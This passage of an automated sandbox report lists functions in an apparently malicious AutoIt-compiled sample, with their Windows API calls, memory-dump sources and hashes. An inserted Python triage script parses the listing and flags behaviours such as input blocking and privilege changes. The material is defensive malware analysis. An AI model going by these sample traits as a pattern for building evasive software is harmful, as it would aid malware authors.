                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$CallLongProc
                                                        • String ID:
                                                        • API String ID: 4084987330-0
                                                        • Opcode ID: 1a3f8d21c1d7ad67ec9c5c8430a584c35298b7f042e9dd762b8ac5be5286d5ec
                                                        • Instruction ID: 87971511a88eda916e95c4623f199b536faabbc47e09ca6d6a4f18fbe195c333
                                                        • Opcode Fuzzy Hash: 1a3f8d21c1d7ad67ec9c5c8430a584c35298b7f042e9dd762b8ac5be5286d5ec
                                                        • Instruction Fuzzy Hash: EEF03C31100108FFCF09DF94EC448793BAAEB08360B408565F9198A6A1C73A9D71EB90
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B736: GetCursorPos.USER32(000000FF), ref: 0072B749
                                                          • Part of subcall function 0072B736: ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                          • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0078F417,?,?,?,?,?,00000001,?), ref: 0077EA9C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                        • String ID:
                                                        • API String ID: 2356834413-0
                                                        • Opcode ID: 0c82190f55a57b265b9251c0c4b352ec358cf1e5447fd288c4ee42b5020312e9
                                                        • Instruction ID: 3662d116af25e41648dbadbce6801c8c53ca389ed51243922f731ecdba7af8a4
                                                        • Opcode Fuzzy Hash: 0c82190f55a57b265b9251c0c4b352ec358cf1e5447fd288c4ee42b5020312e9
                                                        • Instruction Fuzzy Hash: 81F0A731100229FBDF14AF59DC09EBA3F65FB04790F408016F90A1A191D77E98B1EBD1
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0072AF40,?,?,?,?,?), ref: 0072B83B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 5832a3d9f15721d9ce63a083ed649e0fc770c0c99eac78b888d33c8193101361
                                                        • Instruction ID: 1ea7ca8362f6a42023ac61886903c0739b4fd2e0d9cd79399bfc330bebffd0a7
                                                        • Opcode Fuzzy Hash: 5832a3d9f15721d9ce63a083ed649e0fc770c0c99eac78b888d33c8193101361
                                                        • Instruction Fuzzy Hash: E3F08230600259EFDB18DF54DC949353BB6FB45370F50822AF9568B2A0D779DC60EB94
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00767057
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 9d64541e73f87b6c6c4a70ef50d8aad7ce44cbab9c200da7ba8683d3d0846795
                                                        • Instruction ID: 2745ed5ce4ec0f1026d75d5c57741676f18876f814720503f3909d420e507785
                                                        • Opcode Fuzzy Hash: 9d64541e73f87b6c6c4a70ef50d8aad7ce44cbab9c200da7ba8683d3d0846795
                                                        • Instruction Fuzzy Hash: EFE01235204214AFD710ABA9D408A96B7EC9F54790F00C426A945D7251DAB8E9408BA0
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0077F41A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 6b8329ff8d6f04c6feb70116cc41e3b3f83ac464a5e6e6c572ba52d4f82ef137
                                                        • Instruction ID: b35556073a8dee455780ccf09f20774c3289bfd3a675344e28ee5eb69911d1b5
                                                        • Opcode Fuzzy Hash: 6b8329ff8d6f04c6feb70116cc41e3b3f83ac464a5e6e6c572ba52d4f82ef137
                                                        • Instruction Fuzzy Hash: B4F0ED31200288BFCF21DF98CC08FC23BA4FB05360F048059FA14272E1CB746820E764
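The per-function entries above all share one shape: an "APIs" list of `Api.MODULE(args), ref: call-site` lines, with calls made by callees prefixed "Part of subcall function", followed by the memory-dump provenance and the opcode and instruction hashes. The script below is an added triage aid, not part of the Joe Sandbox report or its IDA plugin: it parses that shape into per-function records and flags the API combinations a reverse engineer would open first (BlockInput, the SetUnhandledExceptionFilter/UnhandledExceptionFilter pair, AdjustTokenPrivileges), keeping each function's own calls apart from its callees' so that dialog-procedure plumbing (the NtdllDialogWndProc_W calls are ntdll's DefDlgProcW) does not drown the hits. The sample text is copied from four entries on this page; the rule table, the note on each rule, and the record-id convention (the first direct call site, because these excerpts do not show the function start address) are this example's own assumptions.

```python
import re
from collections import OrderedDict
from typing import Dict, List, Set, Tuple

# Constructed sample: four "APIs" records copied from the listing above. In the
# report each record's API list ends at its "Memory Dump Source" line.
SAMPLE = """\
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0074B9EC), ref: 0074B8C5
• CloseHandle.KERNEL32(?,?,0074B9EC), ref: 0074B8D7
Memory Dump Source
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0071125D,00737A43,00710F35,?,?,00000001), ref: 00738E41
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00738E4A
Memory Dump Source
APIs
  • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
  • Part of subcall function 0072B736: GetCursorPos.USER32(000000FF), ref: 0072B749
  • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000001), ref: 0072B78B
  • Part of subcall function 0072B736: GetAsyncKeyState.USER32(00000002), ref: 0072B799
• NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0078F417,?,?,?,?,?,00000001,?), ref: 0077EA9C
Memory Dump Source
APIs
• BlockInput.USER32(00000001), ref: 00767057
Memory Dump Source
"""

# One entry: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: call-site address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Triage rules: this example's own heuristics, not Joe Sandbox signatures. A
# rule fires when every API in its set is called from the same function.
RULES = OrderedDict([
    ("blocks_user_input", ({"BlockInput"},
        "locks keyboard and mouse; check that the argument is 1 (TRUE)")),
    ("top_level_exception_filter",
        ({"SetUnhandledExceptionFilter", "UnhandledExceptionFilter"},
         "sets a top-level filter and calls UnhandledExceptionFilter directly; a "
         "NULL filter also matches the MSVC CRT fail-fast path, so check the caller")),
    ("adjusts_token_privileges", ({"AdjustTokenPrivileges"},
        "changes token privileges; resolve the LUID it requests")),
    ("polls_mouse_and_keys", ({"GetCursorPos", "GetAsyncKeyState"},
        "polls cursor and key state; inside a dialog procedure usually GUI plumbing")),
])


def parse_listing(text: str) -> List[Dict]:
    """Split the listing into per-function records. A record runs from an
    "APIs" line to "Memory Dump Source"; its id is the ref of its first direct
    call, a stand-in because these excerpts omit the function start address."""
    records: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"id": None, "calls": []}
            continue
        if line == "Memory Dump Source":
            if current is not None and current["calls"]:
                records.append(current)
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(raw)
        if not m:
            continue  # header or hash line, not an API entry
        call = {"api": m.group("api"), "module": m.group("mod"),
                "args": m.group("args").split(","), "ref": m.group("ref"),
                "subcall": m.group("sub")}  # None for the function's own calls
        if call["subcall"] is None and current["id"] is None:
            current["id"] = call["ref"]
        current["calls"].append(call)
    return records


def api_names(record: Dict, include_subcalls: bool) -> Set[str]:
    """APIs the function calls itself, optionally plus those of its callees."""
    return {c["api"] for c in record["calls"]
            if include_subcalls or c["subcall"] is None}


def triage(records: List[Dict], include_subcalls: bool = False) -> List[Tuple[str, str]]:
    """(record id, rule) for every rule whose API set is present. Subcall entries
    are excluded by default: they describe callees and inflate matches in GUI code."""
    hits = []
    for rec in records:
        names = api_names(rec, include_subcalls)
        for rule, (required, _) in RULES.items():
            if required <= names:
                hits.append((rec["id"], rule))
    return hits


if __name__ == "__main__":
    for rec_id, rule in triage(parse_listing(SAMPLE)):
        print(f"{rec_id}  {rule}: {RULES[rule][1]}")
```

Run it as-is to list the hits for the embedded sample, or feed it the report's full function listing with `parse_listing(open(path).read())`. Pass `include_subcalls=True` to see what the callee entries add: on the records above it turns the dialog-procedure function from no hit into a `polls_mouse_and_keys` hit, which is exactly the kind of framework noise the default setting keeps out. The CRT caveat on the exception-filter rule matters here because the SetUnhandledExceptionFilter call on this page passes 00000000 as its first argument, which is what the MSVC fail-fast handler does before it calls UnhandledExceptionFilter itself.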
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0072ACC7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 6df4b1bb4804c177775efd0207e39250c4d1f3644f3a2e18f89a6abbc786a877
                                                        • Instruction ID: de7996d4be8bd434e22c018fd90dd5e57fd41dcd9747880a28d0072bbce3d0b3
                                                        • Opcode Fuzzy Hash: 6df4b1bb4804c177775efd0207e39250c4d1f3644f3a2e18f89a6abbc786a877
                                                        • Instruction Fuzzy Hash: C8E0EC35100208FBCF15AF90DC55E643B36FB49354F508419F6454A2A1CA3AA962EB55
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0078F3D4,?,?,?,?,?,?), ref: 0077F450
                                                          • Part of subcall function 0077E13E: _memset.LIBCMT ref: 0077E14D
                                                          • Part of subcall function 0077E13E: _memset.LIBCMT ref: 0077E15C
                                                          • Part of subcall function 0077E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3EE0,007D3F24), ref: 0077E18B
                                                          • Part of subcall function 0077E13E: CloseHandle.KERNEL32 ref: 0077E19D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                        • String ID:
                                                        • API String ID: 2364484715-0
                                                        • Opcode ID: 120b16b65b3cef83a7e98b3f1e0d6a218b59510d6351deefca81b298873fe5a1
                                                        • Instruction ID: 4d843bbbe263433519437f441695baafab134f4d655ffcb3eb020530f943df19
                                                        • Opcode Fuzzy Hash: 120b16b65b3cef83a7e98b3f1e0d6a218b59510d6351deefca81b298873fe5a1
                                                        • Instruction Fuzzy Hash: F7E09231210249EFCF11EF58DD45E9637A6FB08390F41C055FA09572B1C735A961EF55
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL ref: 0077F3A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 7d55d277ded1c34454b9cbd6d7ad19d31989f7c28ec71a1532fe58121335e8f0
                                                        • Instruction ID: bf3e4bf9cf3d3606f0fb52adf0f5092b8a87bc7eb9ee697cb2a3fcf6220301d2
                                                        • Opcode Fuzzy Hash: 7d55d277ded1c34454b9cbd6d7ad19d31989f7c28ec71a1532fe58121335e8f0
                                                        • Instruction Fuzzy Hash: 6BE0E23420424CEFCB01DF88D844E863BA5FB1A350F014055FD048B261C771A830EB61
                                                        APIs
                                                        • NtdllDialogWndProc_W.NTDLL ref: 0077F3D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogNtdllProc_
                                                        • String ID:
                                                        • API String ID: 3239928679-0
                                                        • Opcode ID: 94ac9fbce110fbb057c0536b32de0343c1078f6ea73fbebce4c1ef5c66b1df20
                                                        • Instruction ID: c33bce632746b60c6623bce1093a89a5eadc44b458db503616b6587b547c3b44
                                                        • Opcode Fuzzy Hash: 94ac9fbce110fbb057c0536b32de0343c1078f6ea73fbebce4c1ef5c66b1df20
                                                        • Instruction Fuzzy Hash: 95E0173420024CEFCB01DFC8D844E863BA5FB1A350F014055FD448B362C772A870EBA1
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0072B85B), ref: 0072B926
                                                          • Part of subcall function 0072B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0072B85B,00000000,?,?,0072AF1E,?,?), ref: 0072B9BD
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0072AF1E,?,?), ref: 0072B864
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                        • String ID:
                                                        • API String ID: 2797419724-0
                                                        • Opcode ID: 0ff652bbcf5741f2019a9fa82eb52c2278d2a4f2f1f088ea5c0d6b82eee4e09d
                                                        • Instruction ID: 9bc3ae77e047bb3466f4beb3caf173b94aaa8b9cb3a8225d7f2d13d8c06974be
                                                        • Opcode Fuzzy Hash: 0ff652bbcf5741f2019a9fa82eb52c2278d2a4f2f1f088ea5c0d6b82eee4e09d
                                                        • Instruction Fuzzy Hash: 3FD0127214430CB7DB106BA1ED0BF493A1DAB04750F808431F605691E18A79A861A5A9
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 5d65fcd87641468af10fbfceb1d5922c41c0d37f7073cd5683b1ca8c4f8ea81d
                                                        • Instruction ID: b8ec2ff21bfb0d4ab096de6bf000f259e9037d85d8f0751d6cd0b71e452e6013
                                                        • Opcode Fuzzy Hash: 5d65fcd87641468af10fbfceb1d5922c41c0d37f7073cd5683b1ca8c4f8ea81d
                                                        • Instruction Fuzzy Hash: 0BC04CB140400DDFC715DB84C9859EFB7BCBB04300F108096A115E1000D7749B459B76
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00738E1F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e8bb9274adffbd7b72b7d5444c348375029d3668fe0f8d6de0e6f72e32c7f267
                                                        • Instruction ID: f2087f1edeba90dbacefdb012addc65d1fe8c423e554641c903cc132cc952175
                                                        • Opcode Fuzzy Hash: e8bb9274adffbd7b72b7d5444c348375029d3668fe0f8d6de0e6f72e32c7f267
                                                        • Instruction Fuzzy Hash: 78A0243000050CF7CF001F71FC044447F5CD705151700C011F40C00131C7335C1145C5
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00736AE9,007C67D8,00000014), ref: 0073A937
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: 23662ccb48c916790ca863418b0591523111506d63d44eafc70399de5a151ccc
                                                        • Instruction ID: 7667f2e1d62c868cfb773455b6ed004a8a9c578401046af96127a27346d38153
                                                        • Opcode Fuzzy Hash: 23662ccb48c916790ca863418b0591523111506d63d44eafc70399de5a151ccc
                                                        • Instruction Fuzzy Hash: E9B012B13035024BD7084B38AC6421A3AE45749101342D03F7003C2560DB349810DF04
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction ID: 70ec7a8712cb9a8e827453b76f7785613839992dd70050742b2df6a577ff67c0
                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction Fuzzy Hash: 1DC1A2722051A34AFF2D463AC43443FBFA15AA27B271A476DD4B3CB4C6EE28C564D660
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction ID: 15966f07e11b16cc6ff4171db01260c5ab18912d54bb9042702197c9f4b1652c
                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction Fuzzy Hash: 65C1C5722051A34AFF2D463AD43443FBFA15AA27B271A476DD4B3CB4C6EE28C524D660
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction ID: 568e522d65938c55f651cc17963de7b0f490dcf489ad58bff2af44c6a36f3d0e
                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction Fuzzy Hash: 74C1C4722051A349FF2D4639943443FFEA15AA27B6B1A476DD4B3CB4C2EE2CC524D6A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: b4d682297c6391f69e35546ebb500a88d67c4e0331fd4f7b9cde530fe7333ef5
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 6AC1D3722051A34AFF2D4639943453FFFA15EA27B270A476DD4B3CB4C6EE28D524C6A0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0076A7A5
                                                        • DeleteObject.GDI32(00000000), ref: 0076A7B7
                                                        • DestroyWindow.USER32 ref: 0076A7C5
                                                        • GetDesktopWindow.USER32 ref: 0076A7DF
                                                        • GetWindowRect.USER32(00000000), ref: 0076A7E6
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0076A927
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0076A937
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A97F
                                                        • GetClientRect.USER32(00000000,?), ref: 0076A98B
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0076A9C5
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A9E7
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076A9FA
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA05
                                                        • GlobalLock.KERNEL32(00000000), ref: 0076AA0E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA1D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0076AA26
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AA2D
                                                        • GlobalFree.KERNEL32(00000000), ref: 0076AA38
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0076AA4A
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0079D9BC,00000000), ref: 0076AA60
                                                        • GlobalFree.KERNEL32(00000000), ref: 0076AA70
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0076AA96
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0076AAB5
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076AAD7
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0076ACC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: fb067e24cf63860fff709958e17d70bc810a8fbe819735df831ef0bc97557974
                                                        • Instruction ID: c8d903484bccaed83ea012983c476ef292b373c02dc3fcc1df680c89d55b42fa
